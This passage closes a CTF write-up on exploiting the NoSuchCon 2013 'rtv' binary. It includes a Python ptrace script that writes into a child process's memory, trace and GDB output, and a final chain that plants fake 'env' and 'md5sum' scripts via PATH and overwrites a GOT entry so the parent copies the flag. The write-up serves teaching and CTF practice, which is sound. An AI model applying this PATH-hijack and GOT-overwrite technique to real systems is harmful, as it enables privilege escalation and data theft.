#ECEFF4;">.</span><span>process</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">setreg</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">eax</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804a060</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #616E88;"> # WRITE WHAT</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span> eip</span><span style="color: #81A1C1;"> == 0x</span><span style="color: #B48EAD;">08048802</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span> gdb</span><span style="color: #ECEFF4;">.</span><span>process</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">writeBytes</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">0x</span><span style="color: #B48EAD;">0804a060</span><span style="color: #ECEFF4;">,</span><span> struct</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">pack</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">&lt;I</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">08048828</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> +</span><span style="color: #ECEFF4;"> &quot;</span><span style="color: #EBCB8B;">\xFF\xF1\xF2\xF3</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span> gdb</span><span style="color: #ECEFF4;">.</span><span>process</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">setreg</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">eax</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">0804a060</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> except</span><span> ProcessSignal</span><span style="color: #ECEFF4;">,</span><span> event</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">[!] Event </span><span style="color: #EBCB8B;">{0}</span><span style="color: #ECEFF4;">&quot;.</span><span style="color: #88C0D0;">format</span><span style="color: #ECEFF4;">(</span><span>event</span><span style="color: #ECEFF4;">))</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> continue</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> except</span><span> ProcessExit</span><span style="color: #ECEFF4;">,</span><span> event</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(</span><span>event</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> except</span><span style="color: #8FBCBB;"> Exception</span><span style="color: #ECEFF4;">,</span><span> event</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Unhandled exception : </span><span style="color: #EBCB8B;">{0}</span><span style="color: #ECEFF4;">&quot;.</span><span style="color: #88C0D0;">format</span><span style="color: #ECEFF4;">(</span><span>event</span><span style="color: #ECEFF4;">))</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> break</span></span></code></pre> <p>The setup of our exploit will be as follow :</p> <ol> <li>Create an env script that writes PARENTPID to a file named "pid"</li> <li>execute <code>PATH=.:$PATH rtv</code></li> <li>execute rtvtrace.py and attach to the child process</li> </ol> <p>Here is the output of rtvtrace.py when executed.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>ekse@montrehack:~/level2/$ ./run_rtvtrace.sh</span></span> <span class="giallo-l"><span>Waiting for pid...</span></span> <span class="giallo-l"><span>Switch to</span></span> <span class="giallo-l"><span>[!] attached to 1188</span></span> <span class="giallo-l"><span>New breakpoint:</span></span> <span class="giallo-l"><span>New breakpoint:</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>PID: 1188</span></span> <span class="giallo-l"><span>Signal: SIGCHLD</span></span> <span class="giallo-l"><span>Child process 1191 exited normally</span></span> <span class="giallo-l"><span>Signal sent by user 1000</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>interrupted by SIGCHLD</span></span> <span class="giallo-l"><span>EIP: 0xb775d424L</span></span> <span class="giallo-l"><span>Send SIGCHLD to</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>PID: 1188</span></span> <span class="giallo-l"><span>Signal: SIGCHLD</span></span> <span class="giallo-l"><span>Child process 1199 exited normally</span></span> <span class="giallo-l"><span>Signal sent by user 1000</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>interrupted by SIGCHLD</span></span> <span class="giallo-l"><span>EIP: 0xb775d424L</span></span> <span class="giallo-l"><span>Send SIGCHLD to</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>PID: 1188</span></span> <span class="giallo-l"><span>Signal: SIGCHLD</span></span> <span class="giallo-l"><span>Child process 1201 exited normally</span></span> <span class="giallo-l"><span>Signal sent by user 1000</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>interrupted by SIGCHLD</span></span> <span class="giallo-l"><span>EIP: 0xb775d424L</span></span> <span class="giallo-l"><span>Send SIGCHLD to</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>PID: 1188</span></span> <span class="giallo-l"><span>Signal: SIGCHLD</span></span> <span class="giallo-l"><span>Child process 1203 exited normally</span></span> <span class="giallo-l"><span>Signal sent by user 1000</span></span> <span class="giallo-l"><span>------------------------------------------------------------</span></span> <span class="giallo-l"><span>interrupted by SIGCHLD</span></span> <span class="giallo-l"><span>EIP: 0xb775d424L</span></span> <span class="giallo-l"><span>Send SIGCHLD to</span></span> <span class="giallo-l"><span>Stopped at</span></span> <span class="giallo-l"><span>EIP: 0x80487d6L</span></span> <span class="giallo-l"><span>Current id loc: 0xbff5295cL value : (0,)</span></span> <span class="giallo-l"><span>Changing data location for write of id...</span></span> <span class="giallo-l"><span>Stopped at</span></span> <span class="giallo-l"><span>EIP: 0x8048802L</span></span> <span class="giallo-l"><span>Process 1188 exited normally</span></span> <span class="giallo-l"><span>Unhandled exception : None</span></span></code></pre> <p>And sure enough, when running rtv in GDB execution ends up at 0x44434241.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>ekse@montrehack:~/level2/exploit_1$ ./run_level2.sh</span></span> <span class="giallo-l"><span>(gdb) run</span></span> <span class="giallo-l"><span>Starting program: /home/level2/rtv</span></span> <span class="giallo-l"><span>Command runtime verification tool v1.0</span></span> <span class="giallo-l"><span>Please wait while command runtimes are being verified...</span></span> <span class="giallo-l"><span>Program received signal SIGSEGV, Segmentation fault.</span></span> <span class="giallo-l"><span>0x44434241 in ?? ()</span></span> <span class="giallo-l"><span>(gdb) bt</span></span> <span class="giallo-l"><span>#0 0x44434241 in ?? ()</span></span> <span class="giallo-l"><span>#1 0x080489d5 in read_measurements ()</span></span> <span class="giallo-l"><span>#2 0x08048bdc in main ()</span></span></code></pre><h2 id="where-do-we-put-our-shellcode">Where do we put our shellcode?</h2> <p>We now have control of the execution of the parent process. The last thing we need to do is to figure where to put our shellcode and jump to it. A technique is often use when doing this kind of challenge is to put the shellcode in an environment variable, prepend a large nopsled in front of it and jump somewhere in it. However this approach does not work as the stack is defined as non-executable, which we can confirm with execstack.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>ekse@montrehack:~/level2/exploit_1$ execstack /home/level2/rtv</span></span> <span class="giallo-l"><span>- /home/level2/rtv</span></span></code></pre> <p>If we look at the output of the map_address.py script, we see that we can have multiple consecutive writes of 8 bytes so we should probably be able to write a short shellcode somewhere. The problem we are facing is that none of the memory section of rtv is both writeable and executable.</p> <p><img src="/assets/naga8.png" alt="naga8" /></p> <p>Another approach would be to use a ROP payload to set the memory region where we put our shellcode executable, but that is somewhat complicated and I'm lazy so I kept looking for an easier way. I reviewed what could be overwritten in the memory and thought about the commands in the Measurements table. We could probably overwrite one of the commands and have it execute what we want, but that doesn't work either as it's the commands in the child address space that are executed... and then it all became clear.</p> <p><img src="/assets/naga9.jpg" alt="naga9" /></p> <p>All we need to do is to redirect execution to <code>make_measurements()</code> so that it is executed in the parent process. This way we can use another command that is called by <code>system()</code> (I used <code>md5sum</code>) to copy the flag. The final setup of our exploit is like this:</p> <ol> <li><code>env</code> is a script that writes PARENTPID to the file "pid"</li> <li><code>md5sum</code> is a script that copies the flag to the file "flag"</li> <li>execute <code>PATH=.:$PATH rtv</code></li> <li>attach to the child process with rtvtrace.py</li> <li>overwrite the address of the <code>read()</code> function in the GOT with the address of <code>make_measurements()</code></li> <li><code>md5sum</code> is called by the parent process, we win.</li> </ol> <p>You can find the code of the exploit and the scripts I presented on my <a rel="nofollow noreferrer external" href="https://github.com/ekse/code/tree/master/ctf/nosuchcon2013/naga3">github repository</a>. The slides I made for Montrehack are also <a rel="nofollow noreferrer external" href="https://docs.google.com/presentation/d/1XzNQulpjE-zqHkBK3iLN5JbAh5iMkl-c3ExFE9C4ZeI/">available</a>.</p> <h2 id="conclusion">Conclusion</h2> <p>This challenge required the use of 3 different vulnerabilities of the program. Each of those taken separately was not sufficient to exploit the program. This is something that is often needed today to bypass modern protection mechanisms, for example one of the winners of Pwn2Own last year <a rel="nofollow noreferrer external" href="http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html">used 6 vulnerabilities</a> to exploit Google Chrome.</p> <p>As I write these lines, I just learned about a <a rel="nofollow noreferrer external" href="http://www.freebsd.org/security/advisories/FreeBSD-SA-13%3a06.mmap.asc">new vulnerability</a> in FreeBSD that was disclosed today and that involves ptrace and mmap. While the context is completely different, it's funny to see that the <a rel="nofollow noreferrer external" href="https://rdot.org/forum/showpost.php?p=32147&amp;postcount=3">exploit code</a> is actually simpler than what we had to do :-)</p>